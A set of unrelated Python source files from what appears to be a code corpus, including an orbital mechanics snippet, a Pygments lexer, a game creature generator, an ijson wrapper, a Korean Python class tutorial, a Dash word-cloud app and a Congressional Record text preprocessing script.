tspan = np.linspace(0, Data['tf'], int(Data['tf']/Data['prnt_out_dt']) +1)
sol = solve_ivp(ThreeBodyProp, [0, Data['tf']],
q0, t_eval = tspan, args = (Data['mu'],),
atol = 1e-15,
rtol = 1e-10)
times_po = sol.t
states_po = sol.y
x = states_po[0]; y = states_po[1]; z = states_po[2]
q0 = np.zeros(42)
q0[:6] = [x0, 0, z0, 0, vy0, 0]
phi0 = np.identity(6)
q0[6:] = phi0.ravel()
sol = solve_ivp(DiffCorrection, [0, Data['tf']],
q0, args = (Data['mu'],),
atol = 1e-15,
rtol = 1e-10)
q = sol.y
Phi = q[6:,-1].reshape(6, -1)
[eigval, eigvec] = linalg.eig(Phi)
# Figures
fig = plt.figure()
ax = Axes3D(fig)
ax.plot(x, y, z)
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
fig2, (ax1, ax2, ax3) = plt.subplots(1, 3, constrained_layout = True)
ax1.plot(x, y)
ax1.set(xlabel='x', ylabel='y')
ax2.plot(x, z)
ax2.set(xlabel='x', ylabel='z')
ax3.plot(y, z)
ax3.set(xlabel='y', ylabel='z')
plt.show()
return (states_po, Data['tf'], eigvec[:, np.imag(eigval) == 0])
| StarcoderdataPython |
3205454 | # flake8: noqa
from __future__ import absolute_import
from pygments.lexer import RegexLexer, bygroups
from pygments.token import *
class FriendscriptLexer(RegexLexer):
name = 'Friendscript'
aliases = ['friendscript']
filenames = ['*.fs']
tokens = {
'root': [
(r'^#!.*\n', Comment.Hashbang),
(r'#.*\n', Comment.Single),
(r'\/.*\/[a-z]*', String.Regex),
(r'\s+(=~|%|~|!~|<<|->|!=|(?:&|\||\^|\+|-|\*|\/|=|<|>)=?)\s+', bygroups(Operator)),
(r'\s+(in|is|not)\s+', bygroups(Operator.Word)),
(r'\s+(as|break|case|continue|else|if|loop(\s+count)?|on|unset|when)\s+', bygroups(Keyword)),
(r'\d', Number),
(r'(true|false|null)', Keyword.Pseudo),
(r'\'', String.Single, 'str'),
(r'"', String.Double, 'str-double'),
(r'\$[^\d\W][\w\.]*\b', Name.Variable),
(r'[\{\},\.\[\];]', Punctuation),
(r'([\w\d]+)\s*(:)(?!:)', bygroups(Name.Attribute, Punctuation)),
(r'([\w\d][\w\d]*)(::[\w\d][\w\d]*)*', Name.Function),
(r'\s+', Text),
],
'str': [
(r'[^\']', String.Single),
(r'\'', String.Single, '#pop'),
],
'str-double': [
(r'{[^}]*}', String.Interpol),
(r'[^"]', String.Double),
(r'"', String.Double, '#pop'),
],
}
| StarcoderdataPython |
6532487 | # -*- coding: utf-8 -*-
# Copyright (c) 2010-2017 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
Classes for creature generation
"""
from pyherc.aspects import log_debug, log_info
from pyherc.data import (add_character, get_locations_by_tag, blocks_movement,
safe_passage)
class CreatureAdder():
"""
Class used to add creatures during level generation
"""
@log_debug
def __init__(self, creatures, configuration, rng):
"""
Default constructor
:param creature_generator: creature generator used to create creatures
:type creature_generator: CreatureGenerator
:param configuration: configuration
:type configuration: CreatureAdderConfiguration
:param rng: random number generator
:type rng: Random
"""
super().__init__()
self.creatures = creatures
self.configuration = configuration
self.rng = rng
@log_debug
def __get_level_types(self):
"""
Get level types this adder can be used at
:returns: level types this adder can be used at
:rtype: [string]
"""
return self.configuration.level_types
def __call__(self, level):
"""
Add creatures to level according to configuration
"""
self.add_creatures(level)
@log_info
def add_creatures(self, level):
"""
Add creatures to level according to configuration
:param level: level to add creatures
:type level: Level
"""
creatures = []
for creature in self.configuration:
amount = self.rng.randint(creature['min_amount'],
creature['max_amount'])
creatures.extend(self.generate_creatures(creature['name'],
amount))
self.place_creatures(creatures, self.configuration, level)
@log_debug
def generate_creatures(self, name, amount):
"""
Generate creatures
:param name: name of the creatures to generate
:type name: string
:param amount: amount of creatures to generate
:type amount: integer
:returns: generated creatures
:rtype: [Character]
"""
creatures = []
for i in range(amount):
new_creature = self.creatures(name)
creatures.append(new_creature)
return creatures
@log_debug
def place_creatures(self, creatures, creature_list, level):
"""
Place creatures into a level
:param creatures: creatures to place
:type creatures: [Character]
:param creature_list: specification where to place creatures
:type creature_list: dict
:param level: level to place creatures
:type level: Level
"""
for creature in creatures:
location_types = [x['location'] for x in creature_list
if x['name'] == creature.name]
if not location_types:
location_types = ['any']
locations = []
for location_type in location_types:
locations.extend([location for location in (get_locations_by_tag(level,
location_type))
if safe_passage(level, location)])
if locations:
location = self.rng.choice(locations)
add_character(level, location, creature)
level_types = property(__get_level_types)
| StarcoderdataPython |
88451 | <gh_stars>100-1000
#
# Contributed by <NAME> <<EMAIL>>
#
# ICRAR - International Centre for Radio Astronomy Research
# (c) UWA - The University of Western Australia, 2016
# Copyright by UWA (in the framework of the ICRAR)
#
'''
Wrapper for _yajl2 C extension module
'''
from ijson import common, compat, utils
from . import _yajl2
_get_buf_size = lambda kwargs: kwargs.pop('buf_size', 64 * 1024)
@utils.coroutine
def basic_parse_basecoro(target, **kwargs):
return _yajl2.basic_parse_basecoro(target.send, **kwargs)
def basic_parse_gen(file, **kwargs):
f = compat.bytes_reader(file)
buf_size = _get_buf_size(kwargs)
return _yajl2.basic_parse(f, buf_size, **kwargs)
def basic_parse_async(file, **kwargs):
buf_size = _get_buf_size(kwargs)
return _yajl2.basic_parse_async(file, buf_size, **kwargs)
@utils.coroutine
def parse_basecoro(target, **kwargs):
return _yajl2.parse_basecoro(target.send, **kwargs)
def parse_gen(file, **kwargs):
f = compat.bytes_reader(file)
buf_size = _get_buf_size(kwargs)
return _yajl2.parse(f, buf_size, **kwargs)
def parse_async(file, **kwargs):
buf_size = _get_buf_size(kwargs)
return _yajl2.parse_async(file, buf_size, **kwargs)
@utils.coroutine
def kvitems_basecoro(target, prefix, map_type=None, **kwargs):
return _yajl2.kvitems_basecoro(target.send, prefix, map_type, **kwargs)
def kvitems_gen(file, prefix, map_type=None, **kwargs):
f = compat.bytes_reader(file)
buf_size = _get_buf_size(kwargs)
return _yajl2.kvitems(f, buf_size, prefix, map_type, **kwargs)
def kvitems_async(file, prefix, map_type=None, **kwargs):
buf_size = _get_buf_size(kwargs)
return _yajl2.kvitems_async(file, buf_size, prefix, map_type, **kwargs)
@utils.coroutine
def items_basecoro(target, prefix, map_type=None, **kwargs):
return _yajl2.items_basecoro(target.send, prefix, map_type, **kwargs)
def items_gen(file, prefix, map_type=None, **kwargs):
f = compat.bytes_reader(file)
buf_size = _get_buf_size(kwargs)
return _yajl2.items(f, buf_size, prefix, map_type, **kwargs)
def items_async(file, prefix, map_type=None, **kwargs):
buf_size = _get_buf_size(kwargs)
return _yajl2.items_async(file, buf_size, prefix, map_type, **kwargs)
common.enrich_backend(globals())
| StarcoderdataPython |
3324179 | <reponame>strangepleasures/kotlin-jupyter<filename>distrib/kotlin_kernel/env_names.py<gh_stars>100-1000
# standard JVM options environment variable
JAVA_OPTS = "JAVA_OPTS"
# specific JVM options environment variable
KERNEL_JAVA_OPTS = "KOTLIN_JUPYTER_JAVA_OPTS"
# additional JVM options to add to either JAVA_OPTS or KOTLIN_JUPYTER_JAVA_OPTS
KERNEL_EXTRA_JAVA_OPTS = "KOTLIN_JUPYTER_JAVA_OPTS_EXTRA"
# used internally to add JVM options without overwriting KOTLIN_JUPYTER_JAVA_OPTS_EXTRA
KERNEL_INTERNAL_ADDED_JAVA_OPTS = "KOTLIN_JUPYTER_KERNEL_EXTRA_JVM_OPTS"
# standard JDK location environment variable
JAVA_HOME = "JAVA_HOME"
# specific JDK location environment variable
KERNEL_JAVA_HOME = "KOTLIN_JUPYTER_JAVA_HOME"
| StarcoderdataPython |
11342205 |
# -*- coding: utf-8 -*-
'''
File name: code\factorial_digit_sum\sol_20.py
Author: <NAME>
Date created: Oct 20, 2018
Python Version: 3.x
'''
# Solution to Project Euler Problem #20 :: Factorial digit sum
#
# For more information see:
# https://projecteuler.net/problem=20
# Problem Statement
'''
n! means n × (n − 1) × ... × 3 × 2 × 1
For example, 10! = 10 × 9 × ... × 3 × 2 × 1 = 3628800,and the sum of the digits in the number 10! is 3 + 6 + 2 + 8 + 8 + 0 + 0 = 27.
Find the sum of the digits in the number 100!
'''
# Solution
# Solution Approach
'''
'''
| StarcoderdataPython |
80800 | <filename>ADVANCED/chapter05_02.py
# Chapter05-2
# 파이썬 심화
# 파이썬 클래스 관련 메소드 심화
# private 속성실습
# - self.__a : `__` 이용한 private 변수 생성하여 instence 에서 접근불가능하게 만든다.
# - Getter, Setter 이용하여 메소드를 활용해서 변경가능하게 만든다.
# - 변수명으로 method 생성하는 것이 관례
# - Getter : @property 어노테이션 이용함
# - Setter : @[getter 메소드명].setter / Getter의 메소드명과 동일하게 생성해야함.
# __slot__ 예제 - 메모리 절감효과
# 객체슬라이딩, 인덱싱
# ABC, 상속, 오버라이딩
# 파이썬 클래스 특별 메소드 심화 활용 및 상속
# Class ABC
# class 선언
class VectorP(object):
def __init__(self, x, y):
self.__x = float(x)
self.__y = float(y)
def __iter__(self):
print('__init__ call')
return (i for i in (self.__x, self.__y)) # Generator
# Getter 역활
@property
def x(self):
print('Called property X')
return self.__x
# Setter 역활 - getter와 이름이 동일해야한다.
@x.setter
def x(self, v):
print('Called property X Setter')
self.__x = v
# Getter 역활
@property
def y(self):
print('Called property Y')
return self.__y
# Setter 역활 - getter와 이름이 동일해야한다.
@y.setter
def y(self, v):
print('Called property Y Setter')
if v < 30:
raise ValueError('30 below is not possible')
self.__y = float(v)
v = VectorP(20, 40)
# 객체선언
# '__' = private , 인스턴스를 이용하더라도 접근불가
# print('EX1-1 -', v.__x, v.__y)
# Getter, Setter
print(v.x)
v.x = 10
v.y = 40
print('EX1-2 -', dir(v), v.__dict__)
print('EX1-3 -', v.x, v.y)
# Iter 확인
for val in v:
print('EX1-4 -', val)
print()
print()
# __slot__
# 파이썬 인터프리터에게 통보
# 핵심 : 해당 클래스가 가지는 속성을 제한
# __dict__ 속성 최적화 -> 다수 객체 생성시 -> 메모리 사용 공간 대폭 감소
# 해당 클래스에 만들어진 인스턴스 속성 관리에 딕셔너리 대신 Set 형태를 사용
# 반드시 문자열로 입력해야 한다.
# 참조설명 - https://planbs.tistory.com/entry/Python-slots
# 알려진(known) 속성들로 구성된 클래스들의 경우 이러한 구조는 딕셔너리가 낭비하는 RAM 때문에 병목이 발생할 수 있습니다.
# 클래스 레벨에 __slots__라는 변수를 설정해서, 해당 클래스에 의해 만들어진 객체의 인스턴스 속성 관리에 딕셔너리 대신
# 속성에 대한 고정된(fixed) set을 사용하도록 할 수 있습니다.
class TestA(object):
__slots__ = ('a',)
class TestB:
pass
use_slot = TestA()
no_slot = TestB()
print('EX2-1 -', use_slot)
# print('EX2-2 -', use_slot.__dict__) # error
print('EX2-3 -', no_slot)
print('EX2-4 -', no_slot.__dict__)
# 메모리 사용량 비교
import timeit
# 측정을 위한 함수 선언
def repeat_outer(obj):
def repeat_inner():
obj.a = 'TEST'
del obj.a
return repeat_inner
print(min(timeit.repeat(repeat_outer(use_slot), number=10000)))
print(min(timeit.repeat(repeat_outer(no_slot), number=10000)))
print()
print()
# 객체 슬라이싱
class Objects:
def __init__(self):
self._numbers = [n for n in range(1, 100, 3)]
def __len__(self):
return len(self._numbers)
def __getitem__(self, idx):
return self._numbers[idx]
s = Objects()
print('EX3-1 -', s.__dict__)
print('EX3-2 -', len(s))
print('EX3-3 -', len(s._numbers))
print('EX3-4 -', s[1:100])
print('EX3-5 -', s[-1])
# 시퀀스객체[::증가폭]
print('EX3-5 -', s[::10])
# 시퀀스객체[시작인덱스::증가폭]
print('EX3-6 -', s[::5])
# 파이썬 추상클래스
# 참고 : https://docs.python.org/3/library/collections.abc.html
# 추상클래스 사용이유
# 자체적으로 객체 생성 불가
# 상속을 통해서 자식 클래스에서 인스턴스를 생성해야함
# 개발과 관련된 공통된 내용(필드, 메소드)을 추출 및 통합해서 공통된 내용으로 작성하게 하는 것
# Sequence 상속 받지 않았지만, 자동으로 __iter__, __contailn__ 기능 작동
# 객체 전체를 자동으로조사 -> 시퀀스 프로토콜
class IterTestA:
def __getitem__(self, item):
print(repr(item))
return range(1, 50, 2)[item] # range(1, 50, 2)
i1 = IterTestA()
print('EX4-1 -', i1[4])
print('EX4-2 -', i1[4:10])
print('EX4-3 -', 3 in i1[1:10])
# print('EX4-4 -', [i for i in i1]) # 이해가 안됨
# print('EX4-4 -', [i for i in i1[:]])
print()
print()
# Sequence 상속
# 요구사항인 추상메소드를 모두 구현해야 동작
from collections.abc import Sequence
class IterTestB(Sequence):
def __getitem__(self, item):
print('__getitem__', repr(item))
return range(1, 50, 2)[item] # range(1, 50, 2)
def __len__(self, idx):
print('__len__', repr(idx))
return len(range(1, 50, 2)[idx])
i2 = IterTestB()
print('EX4-5 -', i2[4])
print('EX4-6 -', i2[4:10])
print('EX4-7 -', 3 in i2[1:10])
print()
print()
# abc 활용예제 - abstract class
import abc
class RandomMachine(abc.ABC): # metaclass=abc.ABCMeta(3.4이하)
# __metaclass__ = abc.ABCMeta
# 추상메소드
@abc.abstractmethod
def load(self, iterobj):
"""Iterable 항목추가"""
# 추상메소드
@abc.abstractmethod
def pick(self):
"""무작위 항목 뽑기"""
def inspect(self):
items = []
while True:
try:
items.append(self.pick())
except LookupError:
break
return tuple(sorted(items))
import random
class CraneMachine(RandomMachine):
def __init__(self, items):
self._readomizer = random.SystemRandom()
self._items = []
self.load(items)
def load(self, iterobj):
self._items.extend(iterobj)
self._readomizer.shuffle(self._items)
def pick(self):
try:
return self._items.pop()
except IndexError: # item이 더이상 없을때 에러발생함.
raise LookupError('Empty Crane Box')
def __call__(self):
return self.pick()
# 서브클래스 확인 - issubclass(자식, 부모)
print('EX5-1 -', issubclass(RandomMachine, CraneMachine))
print('EX5-2 -', issubclass(CraneMachine, RandomMachine))
# 상속 구조 확인
print('EX5-3 -', CraneMachine.__mro__)
cm = CraneMachine(range(1, 100)) # 추상메소드 구현 안하면 에러
print('EX5-4 -', cm._items)
print('EX5-5 -', cm.pick())
print('EX5-6 -', cm())
print('EX5-7 -', cm.inspect())
| StarcoderdataPython |
312759 | import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import glob
#import matplotlib.pyplot as plt
#from wordcloud import WordCloud, STOPWORDS
from PIL import Image
from app_temp import app
path_list = ['./apps/analysis_data/task6', './apps/analysis_data/task7'] # use your path
task_list = ['task6', 'task7']
df = {}
for i, path in enumerate(path_list):
filenames = glob.glob(path+"/*.parquet")
dfs = []
for filename in filenames:
dfs.append(pd.read_parquet(filename))
# Concatenate all data into one DataFrame
df[task_list[i]] = pd.concat(dfs, ignore_index=True)
#******Task 6 fig6******
try:
img6 = Image.open('./img/task6_Word_Cloud.png')
except:
# df['task6'] = df['task6']
# df['task6'] = df['task6'].astype('str')
# title_wordcloud = WordCloud(stopwords=STOPWORDS, background_color='white', height=2000, width=4000).generate(' '.join((df['task6']['title'])))
# plt.figure(figsize=(16,8))
# plt.imshow(title_wordcloud)
# plt.axis('off') # to off the axis of x and y
# plt.savefig('./img/task6_Word_Cloud.png')
img6 = Image.open('./img/task6_Word_Cloud.png')
# Constants
img_width = 1600
img_height = 900
scale_factor = 0.8
fig6 = go.Figure()
# Add invisible scatter trace.
# This trace is added to help the autoresize logic work.
fig6.add_trace(
go.Scatter(
x=[0, img_width * scale_factor],
y=[0, img_height * scale_factor],
mode="markers",
marker_opacity=0
)
)
# Configure axes
fig6.update_xaxes(
visible=False,
range=[0, img_width * scale_factor]
)
fig6.update_yaxes(
visible=False,
range=[0, img_height * scale_factor],
# the scaleanchor attribute ensures that the aspect ratio stays constant
scaleanchor="x"
)
# Add image
fig6.add_layout_image(
dict(
x=0,
sizex=img_width * scale_factor,
y=img_height * scale_factor,
sizey=img_height * scale_factor,
xref="x",
yref="y",
opacity=1.0,
layer="below",
sizing="stretch",
source=img6)
)
# Configure other layout
fig6.update_layout(
width=img_width * scale_factor,
height=img_height * scale_factor,
margin={"l": 0, "r": 0, "t": 0, "b": 0},
)
#******Task 7 fig7******
try:
img7 = Image.open('./img/task7_Word_Cloud.png')
except:
# df['task7'] = df['task7']
# df['task7'] = df['task7'].astype('str')
# overview_wordcloud = WordCloud(stopwords=STOPWORDS, background_color='white', height=2000, width=4000).generate(' '.join((df['task7']['keyword'])))
# plt.figure(figsize=(16,8))
# plt.imshow(overview_wordcloud)
# plt.axis('off') # to off the axis of x and y
# plt.savefig('./img/task7_Word_Cloud.png')
img7 = Image.open('./img/task7_Word_Cloud.png')
# Constants
img_width = 1600
img_height = 900
scale_factor = 0.8
fig7 = go.Figure()
# Add invisible scatter trace.
# This trace is added to help the autoresize logic work.
fig7.add_trace(
go.Scatter(
x=[0, img_width * scale_factor],
y=[0, img_height * scale_factor],
mode="markers",
marker_opacity=0
)
)
# Configure axes
fig7.update_xaxes(
visible=False,
range=[0, img_width * scale_factor]
)
fig7.update_yaxes(
visible=False,
range=[0, img_height * scale_factor],
# the scaleanchor attribute ensures that the aspect ratio stays constant
scaleanchor="x"
)
# Add image
fig7.add_layout_image(
dict(
x=0,
sizex=img_width * scale_factor,
y=img_height * scale_factor,
sizey=img_height * scale_factor,
xref="x",
yref="y",
opacity=1.0,
layer="below",
sizing="stretch",
source=img7)
)
# Configure other layout
fig7.update_layout(
width=img_width * scale_factor,
height=img_height * scale_factor,
margin={"l": 0, "r": 0, "t": 0, "b": 0},
)
layout = html.Div([
html.Div(id='task6_container', children=[
html.H2(id='header_task6', style={'text-align': 'center'}, children='Most Common Words in Movie Titles'),
html.Div(id='task6_p', children=[
html.P(
id="task6_insight",
children="Love, Day, Man and Girl seem to be the most frequent words used in movie titles.",
),
]),
dcc.Graph(figure=fig6, style={"margin": "auto", "width" : '90%'})
]),
html.Div(id='task7_container', children=[
html.H2(id='header_task7', style={'text-align': 'center'}, children='Most Common Keyword in Movies'),
html.Div(id='task7_p', children=[
html.P(
id="task7_insight",
children="Woman Director,independent film and murder seem to be the most frequent keywords associated with movies which give us insight into themes the publishers think would be profitable to push.",
),
]),
dcc.Graph(figure=fig7, style={"margin": "auto", "width" : '90%'})
]),
]) | StarcoderdataPython |
3367964 | <filename>src/preprocess_CR/S5_proxy_grounded.py
import pickle
import random
import math
from pathlib import Path
from typing import Tuple, List, Dict, DefaultDict, Counter, Iterable, Optional
from nltk.corpus import stopwords
from tqdm import tqdm
from data import GroundedWord, Sentence, LabeledDoc
procedural_words = {
'yield', 'motion', 'order', 'ordered', 'quorum', 'roll', 'unanimous',
'mr', 'madam', 'speaker', 'chairman', 'president', 'senator',
'gentleman', 'colleague',
'today', 'rise', 'rise today', 'pleased_to_introduce',
'introducing_today', 'would_like'
}
discard = set(stopwords.words('english')).union(procedural_words)
random.seed(1)
# punctuations = '!"#$%&\'()*+,-—./:;<=>?@[\\]^`{|}~' # excluding underscore
# remove_punctutation = str.maketrans('', '', punctuations)
# remove_numbers = str.maketrans('', '', '0123456789')
def subsampling(
frequency: Counter[str],
heuristic: Optional[str],
threshold: float,
) -> Dict[str, float]:
"""
Downsample frequent words.
Subsampling implementation from annotated C code of Mikolov et al. 2013:
http://mccormickml.com/2017/01/11/word2vec-tutorial-part-2-negative-sampling
This blog post is linked from TensorFlow's website, so authoratative?
NOTE the default threshold is 1e-3, not 1e-5 as in the paper version
"""
cumulative_freq = sum(abs_freq for abs_freq in frequency.values())
keep_prob: Dict[str, float] = dict()
if heuristic is None:
keep_prob = DefaultDict(lambda: 1)
return keep_prob
if heuristic == 'code':
for word_id, abs_freq in frequency.items():
rel_freq = abs_freq / cumulative_freq
keep_prob[word_id] = (
(math.sqrt(rel_freq / threshold) + 1)
* (threshold / rel_freq)
)
elif heuristic == 'paper':
for word_id, abs_freq in frequency.items():
rel_freq = abs_freq / cumulative_freq
keep_prob[word_id] = math.sqrt(threshold / rel_freq)
else:
raise ValueError('Unknown heuristic of subsampling.')
return keep_prob
def partition(speeches: List, num_chunks: int) -> Iterable[List]:
chunk_size = len(speeches) // num_chunks
speech_index = 0
chunk_index = 0
while chunk_index <= num_chunks - 2:
yield speeches[speech_index:speech_index + chunk_size]
speech_index += chunk_size
chunk_index += 1
yield speeches[speech_index:-1]
def export_sorted_frequency(
raw_frequency: Counter[str],
subsampled_frequency: Counter[str],
min_freq: int,
out_path: str
) -> None:
output_iterable: List[Tuple[int, int, str]] = []
for word, raw_freq in raw_frequency.items():
if raw_freq > min_freq:
try:
final_freq = subsampled_frequency[word]
except KeyError:
final_freq = 0
output_iterable.append((raw_freq, final_freq, word))
output_iterable.sort(key=lambda tup: tup[0], reverse=True)
with open(out_path, 'w') as out_file:
for raw_freq, final_freq, phrase in output_iterable:
out_file.write(f'{raw_freq:,}\t{final_freq:,}\t{phrase}\n')
def export_sampled_frequency_by_party(
D_raw: Counter[str],
R_raw: Counter[str],
D_final: Counter[str],
R_final: Counter[str],
word_to_id: Dict[str, int],
out_path: str
) -> None:
def sort_creteria(tup: Tuple) -> Tuple[bool, float]:
df, rf = tup[1], tup[2] # initial frequnecy
if df != 0:
ratio = rf / df
else:
ratio = rf / 1e-8
nontrivial = df + rf > 100
return nontrivial, ratio
output = []
for word in word_to_id:
output.append(
(word, D_raw[word], R_raw[word], D_final[word], R_final[word]))
output.sort(key=sort_creteria, reverse=True)
with open(out_path + '_pretty.txt', 'w') as out_file:
out_file.write('Sorted by GOP/Dem Ratio '
'Original (Dem, GOP) '
'Sampled & Balanced [Dem, GOP]\n')
for word, dr, rr, df, rf in output:
raw_freq = f'({dr:,}, {rr:,})'
final_freq = f'[{df:,}, {rf:,}]'
out_file.write(f'{word:<30}{raw_freq:<20}{final_freq}\n')
with open(out_path + '.tsv', 'w') as out_file:
out_file.write('D/R_Ratio\tTotal_Freq\tD_Freq\tR_Freq\tPhrase\n')
for word, dr, rr, df, rf in output:
try:
ratio = dr / rr
except ZeroDivisionError:
ratio = float('inf')
out_file.write(f'{ratio:.5}\t{dr + rr}\t{dr}\t{rr}\t{word}\n')
# def export_plain_text_corpus(
# sessions: Iterable[int],
# output_dir: str,
# in_dir: str
# ) -> None:
# output_file = open(os.path.join(output_dir, 'corpus.txt'), 'w')
# num_words_exported = 0
# for session in tqdm(sessions, desc='Loading underscored corpora'):
# for party in ('D', 'R'):
# underscored_path = os.path.join(
# in_dir, f'underscored_{party}{session}.txt')
# with open(underscored_path, 'r') as underscored_corpus:
# for line in underscored_corpus:
# num_words_exported += len(line.split())
# output_file.write(line)
# output_file.close()
# print(f'Total number of words = {num_words_exported:,}')
# def count_partisan_frequency(
# sessions: Iterable[int],
# in_dir: Path
# ) -> Tuple[Counter[str], Counter[str], Counter[str]]:
# D_freq: Counter[str] = Counter()
# R_freq: Counter[str] = Counter()
# for session in tqdm(sessions, desc='Counting partisan frequency'):
# for party in ('D', 'R'):
# underscored_path = in_dir / f'underscored_{party}{session}.txt'
# with open(underscored_path, 'r') as underscored_corpus:
# for line in underscored_corpus:
# # line = line.translate(remove_punctutation) # Done in S3
# words = line.split()
# if party == 'D':
# D_freq.update(words)
# else:
# R_freq.update(words)
# combined_frequency = D_freq + R_freq
# return combined_frequency, D_freq, R_freq
def build_vocabulary(
frequency: Counter,
min_frequency: int = 0,
add_special_tokens: bool = True
) -> Tuple[
Dict[str, int],
Dict[int, str]]:
word_to_id: Dict[str, int] = {}
if add_special_tokens:
word_to_id['[PAD]'] = 0
word_to_id['[UNK]'] = 1
word_to_id['[CLS]'] = 2
word_to_id['[SEP]'] = 3
id_to_word = {val: key for key, val in word_to_id.items()}
next_vocab_id = len(word_to_id)
for word, freq in frequency.items():
if word not in word_to_id and freq >= min_frequency:
word_to_id[word] = next_vocab_id
id_to_word[next_vocab_id] = word
next_vocab_id += 1
print(f'Vocabulary size = {len(word_to_id):,}')
return word_to_id, id_to_word
def _export_sorted_frequency_by_party(
D_freq: Counter[str],
R_freq: Counter[str],
word_to_id: Dict[str, int],
out_path: str,
min_freq: int
) -> None:
output = []
for word in word_to_id:
df = D_freq[word]
rf = R_freq[word]
total = df + rf
above_min_freq = total > min_freq
dr = df / total
rr = rf / total
output.append((above_min_freq, dr, rr, df, rf, total, word))
output.sort(key=lambda tup: (tup[0], tup[2], tup[4]), reverse=True)
with open(out_path, 'w') as out_file:
out_file.write(
f'd_ratio\tr_ratio\td_freq\tr_freq\tphrase\n')
for above_min_freq, dr, rr, df, rf, total, phrase in output:
out_file.write(f'{dr:.5}\t{rr:.5}\t{df}\t{rf}\t{phrase}\n')
def export_sorted_frequency_by_party(
sessions: Iterable[int],
output_dir: str,
in_dir: Path,
training_min_freq: int,
sort_min_freq: int
) -> None:
D_freq: Counter[str] = Counter()
R_freq: Counter[str] = Counter()
for session in tqdm(sessions, desc='Loading underscored corpora'):
for party in ('D', 'R'):
underscored_path = in_dir / f'underscored_{party}{session}.txt'
with open(underscored_path, 'r') as underscored_corpus:
for line in underscored_corpus:
words = line.split()
if party == 'D':
D_freq.update(words)
else:
R_freq.update(words)
word_to_id, _ = build_vocabulary(D_freq + R_freq, training_min_freq)
output_path = output_dir / 'vocab_partisan_frequency.tsv'
_export_sorted_frequency_by_party(
D_freq, R_freq, word_to_id, output_path, sort_min_freq)
def balance_classes(socialism: List, capitalism: List) -> List:
total = len(socialism) + len(capitalism)
S_ratio = len(socialism) / total
C_ratio = len(capitalism) / total
print(f'Pre-balanced Dem = {len(socialism):,}\t{S_ratio:.2%}')
print(f'Pre-balanced GOP = {len(capitalism):,}\t{C_ratio:.2%}')
minority = min(len(capitalism), len(socialism))
if len(capitalism) > len(socialism):
capitalism = random.sample(capitalism, k=minority)
print(f'Balancing training data by sampling GOP to {minority:,}.')
else:
socialism = random.sample(socialism, k=minority)
print(f'Balancing training data by sampling Dem to {minority:,}.')
gridlock = socialism + capitalism
return gridlock
def faux_sent_tokenize(
tokens: List,
fixed_sent_len: int,
min_sent_len: int
) -> Iterable[List[str]]:
"""partion a document into fixed-length faux sentences"""
start_index = 0
while (start_index + fixed_sent_len) < (len(tokens) - 1):
yield tokens[start_index:start_index + fixed_sent_len]
start_index += fixed_sent_len
trailing_words = tokens[start_index:-1]
if len(trailing_words) >= min_sent_len:
yield trailing_words
def main(
sessions: Iterable[int],
in_dir: Path,
out_dir: Path,
subsampling_implementation: Optional[str],
subsampling_threshold: float,
min_word_freq: int,
min_sent_len: int,
fixed_sent_len: int,
eval_min_freq: int,
eval_R_thresholds: Iterable[float],
eval_num_random_samples: int,
conserve_RAM: bool
) -> None:
Path.mkdir(out_dir, parents=True, exist_ok=True)
preview = open(out_dir / f'preview.txt', 'w')
print(f'Reading sessions {sessions}. Writing to {out_dir}')
print(f'Reading sessions {sessions}. Writing to {out_dir}', file=preview)
print(f'Min word frequency = {min_word_freq}', file=preview)
print(f'Min sentence length = {min_sent_len}', file=preview)
print(f'Faux sentence fixed length = {fixed_sent_len}', file=preview)
print(f'SGNS subsample implementation= {subsampling_implementation}', file=preview)
print(f'SGNS subsample threshold = {subsampling_threshold}', file=preview)
corpus: List[LabeledDoc] = []
norm_freq: Counter[str] = Counter()
for session in tqdm(
sessions,
desc='Loading multi-word expression underscored pickles...'):
for party in ('D', 'R'):
in_path = in_dir / f'underscored_{party}{session}.txt'
with open(in_path) as underscored_corpus:
for line in underscored_corpus:
underscored_tokens = line.split()
norm_freq.update(underscored_tokens)
corpus.append(LabeledDoc(
uid=None,
title=None,
url=None,
party=party,
referent=None,
text=underscored_tokens,
date=None,
sentences=[]))
cumulative_freq = sum(freq for freq in norm_freq.values())
print(f'Noramlized vocabulary size = {len(norm_freq):,}', file=preview)
print(f'Number of words = {cumulative_freq:,}', file=preview)
# Filter counter with MIN_FREQ and count UNK
UNK_filtered_freq: Counter[str] = Counter()
for key, val in norm_freq.items():
if val >= min_word_freq:
UNK_filtered_freq[key] = val
else:
UNK_filtered_freq['[UNK]'] += val
print(f'Filtered vocabulary size = {len(UNK_filtered_freq):,}', file=preview)
assert sum(freq for freq in norm_freq.values()) == cumulative_freq
# Subsampling & filter by min/max sentence length
keep_prob = subsampling(
UNK_filtered_freq, subsampling_implementation, subsampling_threshold)
ground: Dict[str, GroundedWord] = {}
final_freq: Counter[str] = Counter()
for doc in tqdm(corpus, desc='Subsampling frequent words'):
subsampled_words = []
for token in doc.text:
if token in discard:
continue
if token not in UNK_filtered_freq:
token = '[UNK]'
if random.random() < keep_prob[token]:
subsampled_words.append(token)
for faux_sent in faux_sent_tokenize(
subsampled_words, fixed_sent_len, min_sent_len):
final_freq.update(faux_sent)
doc.sentences.append(Sentence(subsampled_tokens=faux_sent))
for word in faux_sent:
if word not in ground:
ground[word] = GroundedWord(
text=word, deno=None, cono=Counter({doc.party: 1}))
else:
ground[word].cono[doc.party] += 1
if conserve_RAM:
doc.text = None
# End looping documents
